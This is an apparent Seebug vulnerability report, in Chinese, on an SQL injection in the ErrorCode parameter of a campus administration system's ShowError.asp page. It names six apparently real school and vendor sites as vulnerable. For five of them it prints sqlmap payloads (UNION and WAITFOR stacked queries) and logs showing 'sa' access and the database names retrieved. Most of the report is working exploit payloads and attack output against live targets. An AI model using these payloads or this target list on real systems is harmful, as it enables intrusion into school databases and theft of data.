某通用型校园校务系统SQL注入

2014-11-07T00:00:00
ID SSV:95861
Type seebug
Reporter Root
Modified 2014-11-07T00:00:00

Description

简要描述:

boom!!!

详细说明:

厂商:南京苏亚星资讯科技开发有限公司 校务系统输入任意用户名、密码,点击登录,报错的url存在注入漏洞

<img src="https://images.seebug.org/upload/201411/06190159494857e32890d12ae95b7f671eb6b8d4.png" alt="q.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/06190248c033c64239ec6053498f0f409de7785e.png" alt="w.png" width="600" onerror="javascript:errimg(this);">

搜索引擎的案例如下: ErrorCode参数存在注入 http://www.sdwhys.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.zjnksyzx.com:8801/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.dlwsxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 前五个验证通用型 全是sa权限 1、Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-9683' UNION ALL SELECT CHAR(58)+CHAR(103)+CHAR(100)+CHAR (120)+CHAR(58)+CHAR(110)+CHAR(108)+CHAR(114)+CHAR(115)+CHAR(109)+CHAR(65)+CHAR(1 22)+CHAR(76)+CHAR(75)+CHAR(119)+CHAR(58)+CHAR(103)+CHAR(98)+CHAR(111)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--


[16:24:17] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [16:24:17] [INFO] fetching current user [16:24:22] [INFO] heuristics detected web page charset 'ascii' [16:24:22] [WARNING] reflective value(s) found and filtering out current user: 'sa' [16:24:22] [INFO] fetching current database current database: 'SM2005' [16:24:27] [INFO] fetching database names [16:24:31] [INFO] the SQL query used returns 14 entries [16:24:36] [INFO] retrieved: "aaa" [16:24:41] [INFO] retrieved: "Jupiter5" [16:24:45] [INFO] retrieved: "master" [16:24:50] [INFO] retrieved: "Merak" [16:24:54] [INFO] retrieved: "model" [16:24:59] [INFO] retrieved: "msdb" [16:25:04] [INFO] retrieved: "Northwind" [16:25:08] [INFO] retrieved: "pubs" [16:25:13] [INFO] retrieved: "SM2005" [16:25:17] [INFO] retrieved: "SRP2003" [16:25:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [16:25:52] [INFO] retrieved: "tempdb" [16:25:57] [INFO] retrieved: "vc2003" [16:26:02] [INFO] retrieved: "Vod2005" [16:26:15] [INFO] retrieved: "ws2004" available databases [14]: [] aaa [] Jupiter5 [] master [] Merak [] model [] msdb [] Northwind [] pubs [] SM2005 [] SRP2003 [] tempdb [] vc2003 [] Vod2005 [] ws2004 [16:26:15] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [16:26:15] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.sdwhys.com' 2、Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-1530' UNION ALL SELECT CHAR(58)+CHAR(100)+CHAR(113)+CHAR (120)+CHAR(58)+CHAR(90)+CHAR(67)+CHAR(101)+CHAR(106)+CHAR(80)+CHAR(78)+CHAR(75)+ CHAR(82)+CHAR(103)+CHAR(97)+CHAR(58)+CHAR(106)+CHAR(121)+CHAR(99)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--


[16:45:10] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, ASP back-end DBMS: Microsoft SQL Server 2000 [16:45:10] [INFO] fetching current user [16:45:15] [INFO] heuristics detected web page charset 'ascii' [16:45:15] [WARNING] reflective value(s) found and filtering out current user: 'sa' [16:45:15] [INFO] fetching current database current database: 'SM2005' [16:45:19] [INFO] fetching database names [16:45:24] [INFO] the SQL query used returns 13 entries [16:45:29] [INFO] retrieved: "Jupiter5" [16:45:33] [INFO] retrieved: "master" [16:45:38] [INFO] retrieved: "Merak" [16:45:43] [INFO] retrieved: "model" [16:45:47] [INFO] retrieved: "msdb" [16:45:52] [INFO] retrieved: "Northwind" [16:45:57] [INFO] retrieved: "pubs" [16:46:02] [INFO] retrieved: "SM2005" [16:46:06] [INFO] retrieved: "SRP2003" [16:46:11] [INFO] retrieved: "tempdb" [16:46:15] [INFO] retrieved: "TempJupiterSa" [16:46:20] [INFO] retrieved: "Vod2005" [16:46:25] [INFO] retrieved: "ws2004" available databases [13]: [] Jupiter5 [] master [] Merak [] model [] msdb [] Northwind [] pubs [] SM2005 [] SRP2003 [] tempdb [] TempJupiterSa [] Vod2005 [*] ws2004 [16:46:25] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [16:46:25] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com' 3、Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-6910' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(103)+CHAR (118)+CHAR(58)+CHAR(79)+CHAR(68)+CHAR(67)+CHAR(82)+CHAR(109)+CHAR(66)+CHAR(67)+C HAR(76)+CHAR(116)+CHAR(66)+CHAR(58)+CHAR(121)+CHAR(104)+CHAR(97)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--


[16:39:13] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2005 [16:39:13] [INFO] fetching current user [16:39:14] [INFO] heuristics detected web page charset 'ascii' [16:39:14] [WARNING] reflective value(s) found and filtering out current user: 'sa' [16:39:14] [INFO] fetching current database current database: 'SM2005' [16:39:14] [INFO] fetching database names [16:39:14] [INFO] the SQL query used returns 13 entries [16:39:14] [INFO] retrieved: "Jupiter5" [16:39:14] [INFO] retrieved: "master" [16:39:15] [INFO] retrieved: "Merak" [16:39:15] [INFO] retrieved: "model" [16:39:15] [INFO] retrieved: "msdb" [16:39:15] [INFO] retrieved: "ReportServer" [16:39:15] [INFO] retrieved: "ReportServerTempDB" [16:39:16] [INFO] retrieved: "SM2005" [16:39:16] [INFO] retrieved: "SRP2003" [16:39:16] [INFO] retrieved: "tempdb" [16:39:16] [INFO] retrieved: "vc2003" [16:39:16] [INFO] retrieved: "Vod2005" [16:39:17] [INFO] retrieved: "ws2004" available databases [13]: [] Jupiter5 [] master [] Merak [] model [] msdb [] ReportServer [] ReportServerTempDB [] SM2005 [] SRP2003 [] tempdb [] vc2003 [] Vod2005 [*] ws2004 [16:39:17] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [16:39:17] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com' 4、Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-1507' UNION ALL SELECT CHAR(58)+CHAR(116)+CHAR(97)+CHAR( 104)+CHAR(58)+CHAR(108)+CHAR(79)+CHAR(121)+CHAR(98)+CHAR(82)+CHAR(103)+CHAR(119) +CHAR(86)+CHAR(105)+CHAR(107)+CHAR(58)+CHAR(120)+CHAR(115)+CHAR(99)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--


[16:45:31] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [16:45:31] [INFO] fetching current user [16:45:36] [INFO] heuristics detected web page charset 'ascii' [16:45:36] [WARNING] reflective value(s) found and filtering out current user: 'sa' [16:45:36] [INFO] fetching current database current database: 'SM2005' [16:45:40] [INFO] fetching database names [16:45:45] [INFO] the SQL query used returns 23 entries [16:45:49] [INFO] retrieved: "Jupiter5" [16:45:54] [INFO] retrieved: "master" [16:45:59] [INFO] retrieved: "Merak" [16:46:03] [INFO] retrieved: "model" [16:46:08] [INFO] retrieved: "msdb" [16:46:12] [INFO] retrieved: "Northwind" [16:46:17] [INFO] retrieved: "pubs" [16:46:21] [INFO] retrieved: "Sco_CRM" [16:46:26] [INFO] retrieved: "Sco_CSM" [16:46:30] [INFO] retrieved: "Sco_Document" [16:46:35] [INFO] retrieved: "Sco_Financial" [16:46:39] [INFO] retrieved: "Sco_Inventory" [16:46:44] [INFO] retrieved: "Sco_Personnel" [16:46:49] [INFO] retrieved: "Sco_Platform" [16:46:53] [INFO] retrieved: "Sco_Portal" [16:46:58] [INFO] retrieved: "SM2005" [16:47:02] [INFO] retrieved: "SRP2003" [16:47:07] [INFO] retrieved: "tempdb" [16:47:11] [INFO] retrieved: "TempJupiterSa" [16:47:16] [INFO] retrieved: "test" [16:47:20] [INFO] retrieved: "vc2003" [16:47:25] [INFO] retrieved: "web" [16:47:29] [INFO] retrieved: "ws2004" available databases [23]: [] Jupiter5 [] master [] Merak [] model [] msdb [] Northwind [] pubs [] Sco_CRM [] Sco_CSM [] Sco_Document [] Sco_Financial [] Sco_Inventory [] Sco_Personnel [] Sco_Platform [] Sco_Portal [] SM2005 [] SRP2003 [] tempdb [] TempJupiterSa [] test [] vc2003 [] web [*] ws2004 [16:47:30] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [16:47:30] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com' 5、Place: GET Parameter: ErrorCode Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: ErrorCode=-3029' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(113)+CHAR( 105)+CHAR(58)+CHAR(67)+CHAR(108)+CHAR(88)+CHAR(80)+CHAR(100)+CHAR(71)+CHAR(88)+C HAR(66)+CHAR(69)+CHAR(116)+CHAR(58)+CHAR(102)+CHAR(106)+CHAR(122)+CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--


[17:41:19] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [17:41:19] [INFO] fetching current user [17:41:24] [INFO] heuristics detected web page charset 'ascii' [17:41:24] [WARNING] reflective value(s) found and filtering out current user: 'sa' [17:41:24] [INFO] fetching current database current database: 'SM2005' [17:41:29] [INFO] fetching database names [17:41:33] [INFO] the SQL query used returns 13 entries [17:41:38] [INFO] retrieved: "Jupiter5" [17:41:42] [INFO] retrieved: "master" [17:41:47] [INFO] retrieved: "Merak" [17:41:52] [INFO] retrieved: "model" [17:41:56] [INFO] retrieved: "msdb" [17:42:01] [INFO] retrieved: "Northwind" [17:42:06] [INFO] retrieved: "pubs" [17:42:10] [INFO] retrieved: "SM2005" [17:42:15] [INFO] retrieved: "SRP2003" [17:42:19] [INFO] retrieved: "tempdb" [17:42:24] [INFO] retrieved: "vc2003" [17:42:29] [INFO] retrieved: "Vod2005" [17:42:33] [INFO] retrieved: "ws2004" available databases [13]: [] Jupiter5 [] master [] Merak [] model [] msdb [] Northwind [] pubs [] SM2005 [] SRP2003 [] tempdb [] vc2003 [] Vod2005 [*] ws2004 [17:42:33] [WARNING] cannot properly display Unicode characters inside Windows O S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi ll result in replacement with '?' character. Please, find proper character repre sentation inside corresponding output files. [17:42:33] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\??? ~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com'

漏洞证明:

已经证明